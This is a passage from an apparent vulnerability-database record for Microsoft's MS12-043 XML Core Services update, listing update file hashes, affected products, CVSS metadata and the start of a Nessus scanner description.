class=\"sbody-td\">1FDD1EC1AB8902E61AA6DE16A51979D42800E703B94A1FC61FA33AAECBE5B509</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6-KB2721693-ita-x86.exe</td><td 
class=\"sbody-td\">9F9F645D0AA4EB2539B30C896115ED27158B4CEA</td><td class=\"sbody-td\">BDEADCC98E0A80CC91876AE7E4E8FB518688D60A670AFF811E5AB40E86134A40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6-KB2721693-jpn-amd64.exe</td><td class=\"sbody-td\">33B9AA0F2BE184B24D3600C26B34D38182A0924D</td><td class=\"sbody-td\">ADC8F2E14FAA663D23471CE97F3A6B62D6C91193F78EBE4B2C9287854E29AFD6</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6-KB2721693-jpn-ia64.exe</td><td class=\"sbody-td\">986B6E0370C910B294280ED9E60542DDA74C790F</td><td class=\"sbody-td\">489EF15F355C1225BA7A14487F601346C6811C584EDCF5F7B81C6D72C3A832D1</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6-KB2721693-jpn-x86.exe</td><td class=\"sbody-td\">EE8FC2BE9A5E7A2B1C435D68C8E8882638CB957E</td><td class=\"sbody-td\">17F26373D311A8E35BDC5EBBBB09C16D124BE1AB18AEE0CBA7791AB350A5D96F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6-KB2721693-kor-amd64.exe</td><td class=\"sbody-td\">3111517201E6D8F0DD37CFCCB5B29887A90588BF</td><td class=\"sbody-td\">CFD724C513E6EA180DD1A18707D4759EBB1F5E35554C0D194DDE83B7F3B8058E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6-KB2721693-kor-ia64.exe</td><td class=\"sbody-td\">805DBE111648A1734490B07DD978E3B18057ED6D</td><td class=\"sbody-td\">00DAEB980B659D56BEBA531BD2FB317D88C60DC3A9CC50A8C44462AE5A864A40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6-KB2721693-kor-x86.exe</td><td class=\"sbody-td\">A747A3F26AB1C6EA8B0643F98E9CDBCC81164921</td><td class=\"sbody-td\">017722AE1BABF87093D32ED4FF6627605AB331FE9D4992EE4AADAC241E1015AC</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6-KB2721693-nld-amd64.exe</td><td class=\"sbody-td\">BFA060661AC48D6545A8393643EA19AE90ECFB8D</td><td class=\"sbody-td\">F3C950B94C7FF1C3302226D0BF36A3674BC3865AC4013ADEDCFC217B02A33D07</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6-KB2721693-nld-ia64.exe</td><td 
class=\"sbody-td\">3E8E962A213639BBE4D838AC2411A48928ADEF38</td><td class=\"sbody-td\">C9B0F5FE9C459A770463E16CCEC18DABEC7F91D674FCBE5B040F2DD802F43B37</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6-KB2721693-nld-x86.exe</td><td class=\"sbody-td\">6D8ADEFD6F80745EDAD2559F854824D8172432B3</td><td class=\"sbody-td\">9FE2B5914AB95460BFCBA98D5DBF7F1B6BD24E39EC6B2CA7735132D6567093D5</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6-KB2721693-ptb-amd64.exe</td><td class=\"sbody-td\">27466F281D875381A96BC92D53F9C4D0A6E8E861</td><td class=\"sbody-td\">546B6CCD96FE9BC66B4678CDAFDCECCADF5E5A485C745263177EEA76FC55947A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6-KB2721693-ptb-ia64.exe</td><td class=\"sbody-td\">0E88032B505DCB62853FC50CC6A8452C18272877</td><td class=\"sbody-td\">3CB9F3A8F1740E02EAC2632C32FFE37DFE56CCD9AE3608A8262C731F2AB39C55</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6-KB2721693-ptb-x86.exe</td><td class=\"sbody-td\">DC041856C69B824242F6FD13CC46AFB6294FF86A</td><td class=\"sbody-td\">04AEB2C68445911D3A60FB3D32F55BE6B9F063CBE4982E3C023124AE7EC4EF0E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6-KB2721693-rus-amd64.exe</td><td class=\"sbody-td\">46261E10BD7836895B3A25C388286F5B127EBB76</td><td class=\"sbody-td\">B6881663441BACF40630B2171058BE02EA5F699E8B9E845614FA641EE442DAF2</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6-KB2721693-rus-ia64.exe</td><td class=\"sbody-td\">DC76C04EE6EED471371A6BF85E124988E3822857</td><td class=\"sbody-td\">8F0DB05DD3A36471A91F59D19992203AAD97B59F861332C0D5D8D882B816A228</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6-KB2721693-rus-x86.exe</td><td class=\"sbody-td\">377A15C36037FA9F60EAE783D8DE3275CB8004BD</td><td class=\"sbody-td\">C2F6BD48DE217FE54796783A6BFCDFF5DFD910099CF07079A651BA30C2D8E1D9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6-KB2721693-sve-amd64.exe</td><td 
class=\"sbody-td\">E56297EF1A07ECD224FC623A685E1CA5D6A423A1</td><td class=\"sbody-td\">833B6E54289A02B8423388111D4AAFA57F3E542E69FC367ADA8B02FBCA8C2017</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6-KB2721693-sve-ia64.exe</td><td class=\"sbody-td\">AADE757BB56408A84C76CE97129F1CA3638B9B0E</td><td class=\"sbody-td\">88A394A1FCCCE1815263A9D81D168507EA11DCAB1430522E6331B07054F9A934</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6-KB2721693-sve-x86.exe</td><td class=\"sbody-td\">95B34C14AE2E402D84C330C2AC74347302094EE8</td><td class=\"sbody-td\">B97BE310ED2D4A8D5545FDA623BCEC9FE7F37B19CFBAD6A49C730AFF3280249B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB2719985-ia64-custom.msu</td><td class=\"sbody-td\">921BC36353230A951D206505E7FE9A5A5E23FA1B</td><td class=\"sbody-td\">D6A8138245B198FCCEF795DAC21693C86321DA2FE3AB249AC54F000BF9E6EC0F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB2719985-ia64.msu</td><td class=\"sbody-td\">9F81541CFF42F58ACCDCB3F9222C9B684ADFEEDA</td><td class=\"sbody-td\">EA7A3E8FDA3BD0FE854CD87C4490B73992EF37AD63A84B7F985315EA20A9B2C1</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB2719985-x64-custom.msu</td><td class=\"sbody-td\">EABD9D9738761455EFCA2BF3C95CF3700311E76C</td><td class=\"sbody-td\">1EFBB6C9B3721A83142D7DCD4902E8D0607FBFDA028CCF2663582904120B5EFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB2719985-x64.msu</td><td class=\"sbody-td\">BFD4C86D7137483AF42FC44784385D451D3BD57D</td><td class=\"sbody-td\">F18B27FFE6E25E51EE0F328D6C30B1CDA744F60E3A1BE64EF6E83C006A57CAB2</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB2719985-x86-custom.msu</td><td class=\"sbody-td\">035409F889495752B91B83F6BFCA861B6850CAAA</td><td class=\"sbody-td\">D21F87C6BC486676B7FCA158A0BCCEBB1FCB1DEC915D8623DE86C2E1AD3282BB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB2719985-x86.msu</td><td 
class=\"sbody-td\">E9F340456878C00DE895A83AB3B23DA793A7609B</td><td class=\"sbody-td\">936B0E8BCAA18CB81FAE13D67775B7850795E2E5EA708AE74018F7C1852CFEBC</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB2719985-ia64.msu</td><td class=\"sbody-td\">3D32EA7F0DD968A7B7A7372D58F99399A4AFB73F</td><td class=\"sbody-td\">85ECB488E54625643D9186235AB64F9C74D170780EEAAC9DA63E826793B6A78E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB2719985-x64.msu</td><td class=\"sbody-td\">DAC8547A3772E0C19DCD8E38995968B9CCAC7786</td><td class=\"sbody-td\">1CAA73C6D2816F9BAEE99204944C195ABFCBF13BB83F82EBC4FA9F7F41D851E7</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB2719985-x86.msu</td><td class=\"sbody-td\">9AA46E7234A3AB4023A21FC629C64AB9EE6A8EF3</td><td class=\"sbody-td\">EAF64254B3540EF10AE74BBA39CFC56E9DA67F9357A2E5F4F87C1697302E25A2</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.2-KB2719985-arm-BETA.msu</td><td class=\"sbody-td\">2F2237935627F824C4D12A40C0D21CA9C30B24BE</td><td class=\"sbody-td\">80732AECFC95B54C11B1E2D11334AB44B917CC259108628E20AF7D8A1D4C4221</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.2-KB2719985-x64-BETA.msu</td><td class=\"sbody-td\">FF2D2AB452EA9D1A0C58DAA93C0CA67769E86005</td><td class=\"sbody-td\">E8C182CCFE6E4B95307FA427850704EB9473CA924E1F523366AE44064B5417A3</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.2-KB2719985-x86-BETA.msu</td><td class=\"sbody-td\">1AD58D9E31532DFD23D7A20546A2A8D66F9CF0E0</td><td class=\"sbody-td\">82B1C30A3DDD13B866740A4338931FC7AFC41A796AAEF98D534C6B629D5B2E2D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8Family-KB2719985-arm-RP.msu</td><td class=\"sbody-td\">BA932E0FAF7BA4BFC99A40D23BBEAB4D24FE98A1</td><td class=\"sbody-td\">C4E5C5D3A0FC9A6472560327B5E85716AA836EB599A599B6EC060E6B8CDFFA1A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8Family-KB2719985-x64-RP.msu</td><td 
class=\"sbody-td\">287AA94E743522382F7F7E3E668CC3698B543155</td><td class=\"sbody-td\">B72655C68C9B370597029B92EED39B148E0613308BD42C339E1F3583B9674927</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8Family-KB2719985-x86-RP.msu</td><td class=\"sbody-td\">D970445FE883760C2873E1BEF06F3FE15984E6CA</td><td class=\"sbody-td\">21D515FC439133CEC62557403439D1347876107020FD9B218773F37DE94B8A2F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-ia64-custom-DEU.exe</td><td class=\"sbody-td\">E995D3F4D2BDED8F61900BCA444D48DC6FC137F1</td><td class=\"sbody-td\">49E18564B5C8606710F8790CD73201D97E15E0A995D8D962FD7BE93AE0B7C107</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-ia64-custom-ENU.exe</td><td class=\"sbody-td\">1AE42232AE78E851A35C6BFFC2848E18522DBA39</td><td class=\"sbody-td\">C7393E4D1E688211CB4BEA2C1EF71CE590B4872AEFB12B20B917F51429B273AF</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-ia64-custom-FRA.exe</td><td class=\"sbody-td\">FD8DDD832353ED4DBB6C44E2A087A0E27928BE55</td><td class=\"sbody-td\">86F9C0D940B8C07EE33E8192F1BA90EA8EAB1C07F5EB979569CABE383BFB8E86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-ia64-custom-JPN.exe</td><td class=\"sbody-td\">2FF9C3B858407D87C7A49754017344E052391EB8</td><td class=\"sbody-td\">6523982612206043071A0C268264AB903DCF9075150A4BAAC44C103677044667</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-ia64-DEU.exe</td><td class=\"sbody-td\">350F48B640A85CD0EDB1F66B0091211656486299</td><td class=\"sbody-td\">2EE9D7F6DB0571597DA3072745747DDBC88EBF26884620B914345204CB20A309</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-ia64-ENU.exe</td><td class=\"sbody-td\">3D22B40425C209137919D3DCF9A568BA1104D815</td><td class=\"sbody-td\">F995B5A42229453A18DD2E0381C971146C47039AEBA0053BD4FB9C3033F45F79</td></tr><tr 
class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-ia64-FRA.exe</td><td class=\"sbody-td\">3C045D9B2E2C4FF5A565BF68457D035D4CEED497</td><td class=\"sbody-td\">60D1BC44E353F7F693BE62049A408F15C66F4FDF7AB1BDD7686338A7A7F0053F</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">WindowsServer2003-KB2719985-ia64-JPN.exe</th><th class=\"sbody-th\">F2A1AAFD3DF861DC813D3AAD5070C11C308A3BED</th><th class=\"sbody-th\">E0EEE654D5312E6B16E0CBC82E7258B5BD6394A76A780F9B9B9B38F5B54C5D04</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-CHS.exe</td><td class=\"sbody-td\">5DD46C0690DE420E3222AF130213D14F3D95D123</td><td class=\"sbody-td\">BF723759683A694581C2368D8F137B6614A1FFA95858A2D7D491B18B3D82F231</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-CHT.exe</td><td class=\"sbody-td\">44EDE43AA22153EDFCA78C71A07C74937054870B</td><td class=\"sbody-td\">0EDBBDE907A6331635D55451002AD66703614243309467809DEFEE9D2332F00B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-CSY.exe</td><td class=\"sbody-td\">DF3E9A1021E117209C642AC827601153665FCD9A</td><td class=\"sbody-td\">D98863BC2D8F2F90FAF47DBB27A8721581D2749FB610B1D1EC385091062F991F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-custom-CHS.exe</td><td class=\"sbody-td\">5C8BB92A3AAC4EF234B073953AFA6811C0D41950</td><td class=\"sbody-td\">C9D9D2635EBA294BDADB498EF209E565F7D556E20F5E1BD3CEA61F328CB7018C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-custom-CHT.exe</td><td class=\"sbody-td\">82D2CDD25D463463F35693B95F7CC7AE6A941345</td><td class=\"sbody-td\">0ECDCD02F1CCCCA12444C7D67A6754E5D0778339B3121696D1B7C67705C568C4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-custom-CSY.exe</td><td class=\"sbody-td\">A300D1EA6F8327BD4D91C52B62884451D9AB5633</td><td 
class=\"sbody-td\">86F8366E3E0016824E7F3632B297ACBD38318B977136D3B3F28DA2F6038F9054</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-custom-DEU.exe</td><td class=\"sbody-td\">B87B0D0226C9B81FA8EAFE787A034DC76DFF2223</td><td class=\"sbody-td\">39E1D247D78289B7F4F30A79A4D541FA320D372ED4626A4AED7F0D84F13E77FB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-custom-ENU.exe</td><td class=\"sbody-td\">1EE47459FF72EDC43D34949EB28DD113FD405335</td><td class=\"sbody-td\">BA5B37BE5DD9F100B3BBA2202FF0BF9EE28191063ECBF90C90AAE14A95735276</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-custom-ESN.exe</td><td class=\"sbody-td\">E5E2722B329F537E494C036E764B5F2A9D68B502</td><td class=\"sbody-td\">A3F749A53AF356B1BF973582CBFA73FD01B855AD6ADA368CF4905ED01F45E31B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-custom-FRA.exe</td><td class=\"sbody-td\">3466B361CADFFB9B0DF408DA9FFACB77971BBFAD</td><td class=\"sbody-td\">86B386170B62C07F87B1F4750592AF327180FB11AE835B1FCB859DF777F21C41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-custom-HUN.exe</td><td class=\"sbody-td\">05D448FC9C59C85083855760AA8888A70F95FFCD</td><td class=\"sbody-td\">6F8E677FD9EE84A61E552CD61D8B2DBFAB183E74C01EBD89ADBE7ABE6850098A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-custom-ITA.exe</td><td class=\"sbody-td\">69ADAA91A1ED6FF61E9B214F9794BB1A89A5B741</td><td class=\"sbody-td\">BF4FF2624FFDC48E30316C0DA2A463740F0770B788384E78EAB17E377DDAD4B8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-custom-JPN.exe</td><td class=\"sbody-td\">0ED2B0DBB082379FB616BDE68BF259771C2AD466</td><td class=\"sbody-td\">DBAA57F0F6CAA029C60F46318DC8ACD11451995D850165FF35BF7D8716EE1CA5</td></tr><tr class=\"sbody-tr\"><td 
class=\"sbody-td\">WindowsServer2003-KB2719985-x86-custom-KOR.exe</td><td class=\"sbody-td\">057EA47B6F5CF89ACF7C0C011D7168E3F4EE19C5</td><td class=\"sbody-td\">9593A1B0CD2177D19F4A7B1BF20C88809ACC2A8EAC18B23CB72FB45BBBB4305D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-custom-NLD.exe</td><td class=\"sbody-td\">B36603B293868A7D856AC21093F6B90EAD0CE1E8</td><td class=\"sbody-td\">D54CE261733F2CA8959745E2A32DD5F67CA7115E6F7753968EE0EDF76688C446</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-custom-PLK.exe</td><td class=\"sbody-td\">2FCB97B5E35AC7F116C3BF8852B3DCB8AFF8451A</td><td class=\"sbody-td\">B654862985C8CA533ECC261E38E70F4BB341DE94D57F2991E8D688D4290977AE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-custom-PTB.exe</td><td class=\"sbody-td\">8F9712D413074A5DDEAC93ECB4C792DD2AADB68E</td><td class=\"sbody-td\">6DBE0AA551B6818A431163523D104125960113526AB80D0932586E7B2DD3815D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-custom-PTG.exe</td><td class=\"sbody-td\">E881CF1B56316E5BCCA31240BADC7F947E587872</td><td class=\"sbody-td\">381CBF98EA2D9C4D01E7514766A257F2BE1240B307AAE793D381311E23AAA628</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-custom-RUS.exe</td><td class=\"sbody-td\">E9B1F77A2016F4F8A13918B100118050CE44CE79</td><td class=\"sbody-td\">245D6A1F3E835677D614E754918D8AC54B4CA09519166D410199E6E450EDE19E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-custom-SVE.exe</td><td class=\"sbody-td\">78F7FC2D9BFBD2D14FC268785986409E19352B50</td><td class=\"sbody-td\">46221107D6B1F323936E1B3B83B03A695173366C9372CA8CD49B1C81DCE4016F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-custom-TRK.exe</td><td class=\"sbody-td\">6112650D5305472804DB784BDD9DA9EE0833A195</td><td 
class=\"sbody-td\">A0FD16DCD02D40C6A9E53F8EA1B4F64F5B83025F74A427CFDCDBC0B99ED14A14</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-DEU.exe</td><td class=\"sbody-td\">8A65555A4F24CE5549CB13D5AEB23F900E412D91</td><td class=\"sbody-td\">EF11854ACF51CC937A5353144DA21BD7537327C360B33BBECC0023E9485F3758</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-ENU.exe</td><td class=\"sbody-td\">D88236DCBBA74B1B29536E91555168D9DFE0B758</td><td class=\"sbody-td\">4CFAD60207D17EDC59DEAAEDB590A64529ECE3D2EEC92349317EADBADA487E95</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-ESN.exe</td><td class=\"sbody-td\">D77625C93564561C6831FFA5AE6DA0F94442E1C8</td><td class=\"sbody-td\">FF4C997D187FF90AA0BACBDCB5660CE92FE096D64591A4137874211FDF85C800</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-FRA.exe</td><td class=\"sbody-td\">3351B33E3F3571BD9D0A2A6223CA423390D6EA08</td><td class=\"sbody-td\">32E62B90C06DF92EFF317D79513B4F2752AEB4AEDFD892994F1F90912E69B2AF</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-HUN.exe</td><td class=\"sbody-td\">93FAC5493563684C792CFB7AE2391E586CFE1382</td><td class=\"sbody-td\">37C1D9E6BA3DBB86BDE46FE71CF9EC6CB417717EB3C1A51BD7C07E894DDF7E4C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-ITA.exe</td><td class=\"sbody-td\">E95CA61A177E5FFAD385AB7AB93F97002E2E36A0</td><td class=\"sbody-td\">386C6CF352DE4CAC706AEF1FF11632D13CFED0BD0597DC481DE4F6F09C124266</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-JPN.exe</td><td class=\"sbody-td\">368FE9F6FC07A4937B6276838BD618D21AC80FBF</td><td class=\"sbody-td\">7157E37C18D014CE73FCA58BAB9193335B93FA7621F21619949C37357DDFB1C1</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-KOR.exe</td><td 
class=\"sbody-td\">D45585AD57395AB19F01FA801935074BA1246916</td><td class=\"sbody-td\">88B6827D3FFAA1F99FE4D92C04E4E017D1D810132C4B525705EE87F457907FAD</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-NLD.exe</td><td class=\"sbody-td\">05F3433C27D866F38467B49C6A6E2D3A97216329</td><td class=\"sbody-td\">536CD7ACE59C75C12054ED787E59145E3C44A97F0A592AD2A47D792A21F1CDC2</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-PLK.exe</td><td class=\"sbody-td\">0730AAD1D5006DCBDE07A1159EF5D01309B59FAD</td><td class=\"sbody-td\">6FAF69C952FFCF447249B75A5F3F1B974BA85F691212FB287DE36CD1FC30EECC</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-PTB.exe</td><td class=\"sbody-td\">E21ABC4E53F1725553DB4DF646F46BCF76368F7E</td><td class=\"sbody-td\">37342D2749A4B32AF9CA53FEF59B37316CA2B88F91FDF500967C691C8F36BFDD</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-PTG.exe</td><td class=\"sbody-td\">F6346605283009F16530D983ED6A76AB4A576608</td><td class=\"sbody-td\">3DD61CFE40553B9FBD23D3D9BCC204739DD07F045FD309CA04B17BE93CB992EF</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-RUS.exe</td><td class=\"sbody-td\">9D501B805F8A82BDE54AE0128A5AF7189798D201</td><td class=\"sbody-td\">65F7FEBD670F2CCA3AF95F194CA2ABC2C902DDEF6E070754D54FA1291D78B60B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-SVE.exe</td><td class=\"sbody-td\">BEA86821A2D887FE8B991A8F114832DAF6D3E662</td><td class=\"sbody-td\">31095CC7F1590DB92DDDD6012F41C23BB97C0E36F75BF2875AD322241D634CE4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-TRK.exe</td><td class=\"sbody-td\">85D56B625AA35286B50242B3261C79A11E0B923A</td><td class=\"sbody-td\">95A4E8459E28452739C2EDB699CE55107CF428F4B5999EDB3896577806016BE4</td></tr><tr class=\"sbody-tr\"><td 
class=\"sbody-td\">WindowsXP-KB2719985-x86-NOR.exe</td><td class=\"sbody-td\">BA43BD0A1FC3C1C3031F4A0E4201D37D5FF06255</td><td class=\"sbody-td\">190C1C39493F68D9E60213A65712EA60C7686414468660280B23645C3569817D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-PLK.exe</td><td class=\"sbody-td\">E3C1748D5F89417180F47FAB4AC828E10810E329</td><td class=\"sbody-td\">BEF02F5CCD3A37E10D5818D6EB83D76AA654EF0D3F0F30E9301614288F888DF3</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-PTB.exe</td><td class=\"sbody-td\">139273177687051E59F373639697D83238AF58CB</td><td class=\"sbody-td\">3366BE95C8CDF376F738FEAE86481BBA1C6C888B6D3260708123FD1D0986FD78</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-PTG.exe</td><td class=\"sbody-td\">D79E047911EE0BC21B9FBCFF06B3C36B94D04D22</td><td class=\"sbody-td\">80859057A2BEBE5660CE99694F4C3273FD6CAA89CCAA5A281A24969DD1082F95</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-RUS.exe</td><td class=\"sbody-td\">46BEF054D0D20C45B4B87F50E7071E6083B52B12</td><td class=\"sbody-td\">A030A485DFBC681210B9C7384BE12179549A929C0D7E2A76C070A8899A497D8B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-SVE.exe</td><td class=\"sbody-td\">F531110A597EF9F6D697ACAD2E27B4B21CA0766D</td><td class=\"sbody-td\">3E6ED8688B90DD84D13631F52AEFB29EB6A2CBC868206D84CE750277AB753C55</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-TRK.exe</td><td class=\"sbody-td\">BF824FDC889B1C8C1DCBDF1465180173BDEC655F</td><td class=\"sbody-td\">2B2EF4332CD02D78E990FBEFAA2E488FCFC626A03558B2AAEFFC14442CFD9CF4</td></tr></table></div></div><h2></h2><div class=\"kb-notice-section section\"><a class=\"bookmark\" id=\"appliestoproducts\"></a><br/><h3 class=\"sbody-h3\">Applies to</h3>This article applies to the following:<br/><ul class=\"sbody-free_list\"><li>Microsoft XML Core Services 6.0 Service Pack 2 when used 
with:<br/><ul class=\"sbody-free_list\"><li>Windows 7</li><li>Windows 7 Service Pack 1</li><li>Windows Server 2008 R2</li><li>Windows Server 2008 R2 Service Pack 1</li><li>Windows Server 2008 Service Pack 2</li><li>Windows Vista Service Pack 2</li><li>Windows Server 2008 Service Pack 2</li><li>Windows XP Service Pack 3</li><li>Windows XP Professional x64 Edition Service Pack 2</li><li>Windows Server 2003 Service Pack 2</li></ul></li><li>Microsoft XML Core Services 5.0 when used with:<ul class=\"sbody-free_list\"><li>Microsoft Office SharePoint Server 2007 Service Pack 2</li><li>Microsoft Office SharePoint Server 2007 Service Pack 3</li><li>Microsoft Groove Server 2007 Service Pack 2</li><li>Microsoft Groove Server 2007 Service Pack 3</li><li>2007 Microsoft Office Suite Service Pack 2</li><li>2007 Microsoft Office Suite Service Pack 3</li><li>Microsoft Office Word Viewer</li><li>Microsoft Office Compatibility Pack Service Pack 2</li><li>Microsoft Office Compatibility Pack Service Pack 3</li><li>Microsoft Expression Web Service Pack 1</li><li>Microsoft Expression Web 2</li><li>Microsoft Office 2003 Service Pack 3</li></ul></li><li>Microsoft XML Core Services 4.0 Service Pack 3 when used with:<br/><ul class=\"sbody-free_list\"><li>Windows 8</li><li>Windows Server 2012</li><li>Windows 7</li><li>Windows 7 Service Pack 1</li><li>Windows Server 2008 R2</li><li>Windows Server 2008 R2 Service Pack 1</li><li>Windows Server 2008 Service Pack 2</li><li>Windows Vista Service Pack 2</li><li>Windows Server 2008 Service Pack 2</li><li>Windows XP Service Pack 3</li><li>Windows XP Professional x64 Edition Service Pack 2</li><li>Windows Server 2003 Service Pack 2</li></ul></li><li>Microsoft XML Core Services 3.0 when used with:<br/><ul class=\"sbody-free_list\"><li>Windows 7</li><li>Windows 7 Service Pack 1</li><li>Windows Server 2008 R2</li><li>Windows Server 2008 R2 Service Pack 1</li><li>Windows Server 2008 Service Pack 2</li><li>Windows Vista Service Pack 2</li><li>Windows Server 
2008 Service Pack 2</li><li>Windows XP Service Pack 3</li><li>Windows XP Professional x64 Edition Service Pack 2</li><li>Windows Server 2003 Service Pack 2</li></ul></li></ul></div></body></html>", "edition": 2, "modified": "2012-12-11T18:44:28", "id": "KB2722479", "href": "https://support.microsoft.com/en-us/help/2722479/", "published": "2012-08-14T00:00:00", "title": "MS12-043: Vulnerability in Microsoft XML Core Services could allow remote code execution: August 14, 2012", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-01T05:43:35", "description": "The version of Microsoft XML Core Services installed on the remote\nWindows host is affected by a remote code execution vulnerability\nthat could allow arbitrary code execution if a user views a specially\ncrafted web page using Internet Explorer.", "edition": 26, "published": "2012-07-11T00:00:00", "title": "MS12-043: Vulnerability in Microsoft XML Core Services Could Allow Remote Code Execution (2722479)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": 